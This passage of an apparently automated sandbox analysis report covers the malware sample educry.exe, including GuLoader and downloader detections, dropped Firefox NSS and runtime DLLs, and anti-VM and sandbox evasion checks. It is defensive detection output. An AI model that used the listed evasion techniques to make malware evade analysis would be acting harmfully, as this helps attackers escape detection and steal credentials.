            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: educry.exe, 00000001.00000003.244888910.000000001EA50000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: educry.exe, 00000001.00000003.244281666.000000001EA3C000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: educry.exe, 00000001.00000003.249950826.000000001F400000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.1.dr
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: educry.exe, 00000001.00000003.249950826.000000001F400000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdb source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: educry.exe, 00000001.00000003.250454038.000000001F468000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: educry.exe, 00000001.00000003.245146609.000000001EA34000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: educry.exe, 00000001.00000003.250142825.000000001F414000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: educry.exe, 00000001.00000003.250262723.000000001F424000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: educry.exe, 00000001.00000003.250142825.000000001F414000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
            Source: Binary string: msvcp140.i386.pdbGCTL source: educry.exe, 00000001.00000003.245831740.000000001EA34000.00000004.00000001.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: educry.exe, 00000001.00000003.249784765.000000001F3DC000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: educry.exe, 00000001.00000003.250497008.000000001F488000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: educry.exe, 00000001.00000003.249784765.000000001F3DC000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: educry.exe, 00000001.00000003.249784765.000000001F3DC000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: educry.exe, 00000001.00000003.244768131.000000001EA44000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: educry.exe, 00000001.00000003.250537020.000000001F49C000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.263140364.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: educry.exe PID: 6624, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: educry.exe PID: 6588, type: MEMORY
            Binary contains a suspicious time stampShow sources
            Source: initial sampleStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
            Yara detected VB6 Downloader GenericShow sources
            Source: Yara matchFile source: Process Memory Space: educry.exe PID: 6624, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: educry.exe PID: 6588, type: MEMORY
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_0040420A push ecx; ret 0_2_00404216
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_00404E14 push ebp; retf 0_2_00404E84
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_004055AB push cs; ret 0_2_004055B9
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A0047 push ds; ret 0_2_023A0051
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\nss3.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\nssdbm3.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\mozglue.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\freebl3.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\vcruntime140.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\msvcp140.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\ucrtbase.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\softokn3.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\educry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\educry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\educry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\educry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\educry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\educry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\educry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\educry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\educry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\educry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\educry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\educry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A323D 0_2_023A323D
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\educry.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\educry.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Users\user\Desktop\educry.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\educry.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: educry.exe, educry.exe, 00000001.00000002.263140364.0000000000560000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A323D rdtsc 0_2_023A323D
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\nssdbm3.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\softokn3.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\freebl3.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\educry.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
            Source: C:\Users\user\Desktop\educry.exe TID: 6988Thread sleep count: 125 > 30Jump to behavior
            Source: educry.exe, 00000001.00000003.257385378.000000001F3C0000.00000004.00000001.sdmpBinary or memory string: Files\1\IVHSHTCODI\IVHSHTCODI.docxIVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000001.00000003.262199742.000000001E060000.00000004.00000001.sdmpBinary or memory string: PZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: educry.exe, 00000001.00000003.257385378.000000001F3C0000.00000004.00000001.sdmpBinary or memory string: WXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
